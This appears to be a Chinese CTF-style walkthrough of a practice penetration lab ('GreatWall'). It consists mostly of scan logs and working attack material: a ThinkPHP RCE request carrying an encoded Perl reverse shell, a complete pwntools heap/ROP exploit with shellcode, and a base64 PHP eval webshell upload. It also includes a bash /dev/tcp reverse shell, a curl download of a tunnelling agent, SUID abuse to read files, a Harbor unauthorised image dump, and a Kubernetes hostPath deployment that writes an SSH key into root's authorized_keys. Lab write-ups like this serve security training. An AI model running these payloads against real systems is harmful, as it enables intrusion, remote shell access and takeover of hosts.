春秋云境-GreatWall

入口：39.101.76.98

扫下：

[2025-03-04 18:33:08] [INFO] 暴力破解线程数: 1
[2025-03-04 18:33:08] [INFO] 开始信息扫描
[2025-03-04 18:33:08] [INFO] 最终有效主机数量: 1
[2025-03-04 18:33:08] [INFO] 开始主机扫描
[2025-03-04 18:33:09] [INFO] 有效端口数量: 233
[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:80
[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:22
[2025-03-04 18:33:09] [SUCCESS] 服务识别 39.101.76.98:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-04 18:33:11] [SUCCESS] 端口开放 39.101.76.98:8080
[2025-03-04 18:33:14] [SUCCESS] 服务识别 39.101.76.98:80 => [http]
[2025-03-04 18:33:14] [SUCCESS] 服务识别 39.101.76.98:8080 => [http]
[2025-03-04 18:33:16] [INFO] 存活端口数量: 3
[2025-03-04 18:33:16] [INFO] 开始漏洞扫描
[2025-03-04 18:33:16] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-04 18:33:16] [SUCCESS] 网站标题 http://39.101.76.98       状态码:200 长度:10887  标题:""
[2025-03-04 18:33:17] [SUCCESS] 网站标题 http://39.101.76.98:8080  状态码:200 长度:1027   标题:Login Form
[2025-03-04 18:33:35] [SUCCESS] 目标: http://39.101.76.98:8080
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc2
  详细信息:
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

TP5.0.23RCE

vulhub/thinkphp/5.0.23-rce at master · vulhub/vulhub

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

反弹 shell：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif%28%24p%29%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET%28PeerAddr%2C%221xxx8%3A8088%22%29%3BSTDIN-%3Efdopen%28%24c%2Cr%29%3B%24~-%3Efdopen%28%24c%2Cw%29%3Bsystem%24_%20while%3C%3E%3B%27

vshell 一键上线。

PWN

172 段

[2025-03-04 18:47:07] [INFO] 暴力破解线程数: 1
[2025-03-04 18:47:07] [INFO] 开始信息扫描
[2025-03-04 18:47:07] [INFO] CIDR范围: 172.28.23.0-172.28.23.255
[2025-03-04 18:47:07] [INFO] 生成IP范围: 172.28.23.0.%!d(string=172.28.23.255) - %!s(MISSING).%!d(MISSING)
[2025-03-04 18:47:07] [INFO] 解析CIDR 172.28.23.17/24 -> IP范围 172.28.23.0-172.28.23.255
[2025-03-04 18:47:07] [INFO] 最终有效主机数量: 256
[2025-03-04 18:47:07] [INFO] 开始主机扫描
[2025-03-04 18:47:07] [INFO] 正在尝试无监听ICMP探测...
[2025-03-04 18:47:07] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-04 18:47:07] [INFO] 切换为PING方式探测...
[2025-03-04 18:47:07] [SUCCESS] 目标 172.28.23.26    存活 (ICMP)
[2025-03-04 18:47:07] [SUCCESS] 目标 172.28.23.17    存活 (ICMP)
[2025-03-04 18:47:07] [SUCCESS] 目标 172.28.23.33    存活 (ICMP)
[2025-03-04 18:47:13] [INFO] 存活主机数量: 3
[2025-03-04 18:47:13] [INFO] 有效端口数量: 233
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.33:22
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.26:22
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.26:21
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.17:22
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.26:80
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.17:80
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.17:8080
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.33:8080
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.33:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.10.]
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.26:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.26:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.17:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-04 18:47:19] [SUCCESS] 服务识别 172.28.23.17:8080 => [http]
[2025-03-04 18:47:19] [SUCCESS] 服务识别 172.28.23.33:8080 => [http]
[2025-03-04 18:47:20] [SUCCESS] 服务识别 172.28.23.17:80 => [http]
[2025-03-04 18:47:20] [SUCCESS] 服务识别 172.28.23.26:80 => [http]
[2025-03-04 18:47:20] [INFO] 存活端口数量: 8
[2025-03-04 18:47:20] [INFO] 开始漏洞扫描
[2025-03-04 18:47:20] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.17       状态码:200 长度:10887  标题:""
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.17:8080  状态码:200 长度:1027   标题:Login Form
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.26       状态码:200 长度:13693  标题:新翔OA管理系统-OA管理平台联系电话：13849422648微信同号，QQ958756413
[2025-03-04 18:47:20] [SUCCESS] 匿名登录成功!
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.33:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=F926A750A2597E0C56DBD301AA0F75E5
[2025-03-04 18:47:21] [SUCCESS] 网站标题 http://172.28.23.33:8080/login;jsessionid=F926A750A2597E0C56DBD301AA0F75E5 状态码:200 长度:3860   标题:智联科技 ERP 后台登陆
[2025-03-04 18:47:21] [SUCCESS] 目标: http://172.28.23.17:8080
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-03-04 18:47:22] [SUCCESS] 目标: http://172.28.23.33:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-04 18:47:22] [SUCCESS] 目标: http://172.28.23.33:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
        links:https://github.com/LandGrey/SpringBootVulExploit

heapdump 泄露 拉出个隧道

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

godzilla 上内存马链接下载 hashnote，大头的脚本

from pwn import *

elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')

p = remote('172.28.23.33', 59696)

def send_command(command):
    p.sendlineafter(': ', str(command))

def add_entry(key, value):
    send_command(1)
    p.sendlineafter('Key: ', key)
    p.sendlineafter('Data: ', value)

def get_entry(key):
    send_command(2)
    p.sendlineafter('Key: ', key)

def update_entry(key, value):
    send_command(3)
    p.sendlineafter('Key: ', key)
    p.sendlineafter('Data: ', value)

def set_username(value):
    send_command(4)
    p.sendafter('New username: ', value)

p.sendlineafter('Username: ', '123')
p.sendlineafter('Password: ', 'freep@ssw0rd:3')

add_entry('aabP', 'aaaaaaaa')
add_entry('aace', 'C' * 0xc0)

sc = [
    '\x6a\x3b',                   # push   0x3b
    '\x58',                       # pop    rax
    '\x99',                       # cdq
    '\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68', # movabs rbx, 0x68732f6e69622f2f
    '\x53',                       # push   rbx
    '\x48\x89\xe7',               # mov    rdi, rsp
    '\x52',                       # push   rdx
    '\x57',                       # push   rdi
    '\x48\x89\xe6',               # mov    rsi, rsp
    '\x0f\x05'                    # syscall
]
shellcode = b''.join(sc)
username_addr = 0x5dc980
fake_obj_addr = username_addr + 0x10

def arbitrary_read(addr):
    payload = p64(fake_obj_addr)
    payload += p64(0xdeadbeef)

    fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
    fake_obj += 'aahO'.ljust(0x10, '\x00')
    fake_obj += p64(addr) + p64(8) + 'aaaaaaaa'

    payload += fake_obj
    payload += shellcode
    payload = payload.ljust(128, '\x00')
    set_username(payload)
    get_entry('aahO')

# 任意读/写函数
def arbitrary_write(addr, data):
    payload = p64(fake_obj_addr)
    payload += p64(0xdeadbeef)

    fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
    fake_obj += 'aahO'.ljust(0x10, '\x00')
    fake_obj += p64(addr) + p64(len(data)) + 'aaaaaaaa'

    payload += fake_obj
    payload += shellcode
    payload = payload.ljust(128, '\x00')
    set_username(payload)
    update_entry('aahO', data)

environ = 0x5e4c38
arbitrary_read(environ)
stack_addr = u64((p.recvuntil('\x7f', drop=False)[-6:].ljust(8, '\0')))
success('stack_addr', stack_addr)

rdi = 0x0000000000405e7c
rsi = 0x000000000040974f
rax = 0x00000000004206ba
rdx_rbx = 0x000000000053514b
shr_eax_2 = 0x0000000000523f2e
syscall_ret = 0x00000000004d9776

payload = p64(rdi) + p64(username_addr & ~0xfff) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(0xa << 2) + p64(shr_eax_2) + p64(syscall_ret) + p64(username_addr + 0x48)

arbitrary_write(stack_addr - 0x210, payload)
p.sendline('uname -ar')

p.interactive()

Disable_function\suid 提权

ftp 这个有个坑

本地不知道为什么不行

http://172.28.23.26/uploadbase64.php
imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B

有 disable_funtion 蚂蚁的剑插件绕过下。

这里不能用 post 的马，需要上传一个 get 的马，然后在.antproxy.php中修改为 get 的马。

执行

没权限读取 flag 需要 suid 提权。

find / -xdev -type f -perm /4000 -exec ls -al {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null

/bin/fusermount /bin/ping6 /bin/mount /bin/su /bin/ping /bin/umount /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/at /usr/bin/staprun /usr/bin/base32 /usr/bin/passwd /usr/bin/chsh /usr/bin/sudo /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/s-nail/s-nail-privsep

可以用 base32 来获取 flag。

http://172.28.23.26/upload/.antproxy.php?1=system("base32 /fla* | base32 --decode");

Harbor 未授权

用的 gost 做的流量转发把 shell 弹出去，再用 stowaway 和前面节点连接起来。

./gost -L tcp://:18080/1xxx68:8096

http://172.28.23.26/upload/.antproxy.php?1=system(%22bash%20-c%20%5C%22%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.28.23.17%2F18080%200%3E%261%5C%22%22)%3B

stowaway

./linux_x64_agent -c 1xxx8:8096 -s 1234 --reconnect 8

curl http://172.28.23.17:7779/linux_x64_agent -o /tmp/linux_x64_agent

fscan 一下

[2025-03-04 21:29:51] [HOST] 目标:172.22.14.6 状态:alive 详情:protocol=ICMP
[2025-03-04 21:29:51] [HOST] 目标:172.22.14.37 状态:alive 详情:protocol=ICMP
[2025-03-04 21:29:51] [HOST] 目标:172.22.14.46 状态:alive 详情:protocol=ICMP
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.46 状态:open 详情:port=22
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.46 状态:identified 详情:os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11., port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.11, product=OpenSSH
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.6 状态:open 详情:port=80
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.37 状态:open 详情:port=22
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.37 状态:identified 详情:os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7., port=22, service=ssh, version=7.6p1 Ubuntu 4ubuntu0.7, product=OpenSSH
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.6 状态:open 详情:port=22
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.6 状态:identified 详情:banner=SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10., port=22, service=ssh, version=7.2p2 Ubuntu 4ubuntu2.10, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.6 状态:open 详情:port=21
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.6 状态:identified 详情:port=21, service=ftp, version=3.0.3, product=vsftpd, os=Unix, banner=220 (vsFTPd 3.0.3).
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.46 状态:open 详情:port=80
[2025-03-04 21:30:02] [SERVICE] 目标:172.22.14.46 状态:identified 详情:port=80, service=http, product=nginx
[2025-03-04 21:30:03] [SERVICE] 目标:172.22.14.6 状态:identified 详情:port=80, service=http
[2025-03-04 21:30:03] [SERVICE] 目标:172.22.14.46 状态:identified 详情:url=http://172.22.14.46, status_code=200, length=785, server_info=map[accept-ranges:bytes cache-control:no-store, no-cache, must-revalidate content-length:785 content-security-policy:frame-ancestors 'none' content-type:text/html date:Tue, 04 Mar 2025 13:30:03 GMT etag:"65f177f2-311" last-modified:Wed, 13 Mar 2024 09:54:58 GMT length:785 server:nginx status_code:200 title:Harbor x-frame-options:DENY], fingerprints=[], port=80, service=http, title=Harbor
[2025-03-04 21:30:03] [SERVICE] 目标:172.22.14.6 状态:identified 详情:length=13693, server_info=map[content-type:text/html;charset=utf-8 date:Tue, 04 Mar 2025 13:30:03 GMT length:13693 server:Apache/2.4.18 (Ubuntu) status_code:200 title:新翔OA管理系统-OA管理平台联系电话：13849422648微信同号，QQ958756413 vary:Accept-Encoding], fingerprints=[], port=80, service=http, title=新翔OA管理系统-OA管理平台联系电话：13849422648微信同号，QQ958756413, url=http://172.22.14.6, status_code=200
[2025-03-04 21:30:03] [VULN] 目标:172.22.14.6 状态:vulnerable 详情:username=anonymous, password=, type=anonymous-login, directories=[OASystem.zip], port=21, service=ftp

CVE-2022-46463

harbor 未授权

GitHub - 404tk/CVE-2022-46463: harbor unauthorized detection

下载镜像。

python .\harbor.py http://172.22.14.46/ --dump harbor/secret --v2

cd ./caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
cat f1ag05_Yz1o.txt

然后再拉取project_projectadmin，其中的 run.sh 运行了 ProjectAdmin-0.0.1-SNAPSHOT.jar

caches\project_projectadmin\latest\ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c\app\ProjectAdmin-0.0.1-SNAPSHOT.jar

反编译里面有数据库账号密码，连接上去之后 mdut。

这个用 mdut-extend 不行 但是原版就可以，很奇怪。

K8S

k8s-api-server

最后这个环境有问题 搞了几次都有问题。

整个 evil-deployment.yaml 将宿主机目录挂载到容器内部的/mnt。

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

创建 pod、get 获取 pod，exec 后写 SSH 公钥到 authorized_keys 中。再 SSH 连接。flag 在数据库里面，base 解码一下。

kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-7pzlq /bin/bash
echo "ssh-rsa AAAxx= root@kali" > /mnt/root/.ssh/authorized_keys

ssh -i /home/kali/.ssh/id_rsa root@172.22.14.37

use flaghaha;
select * from flag04;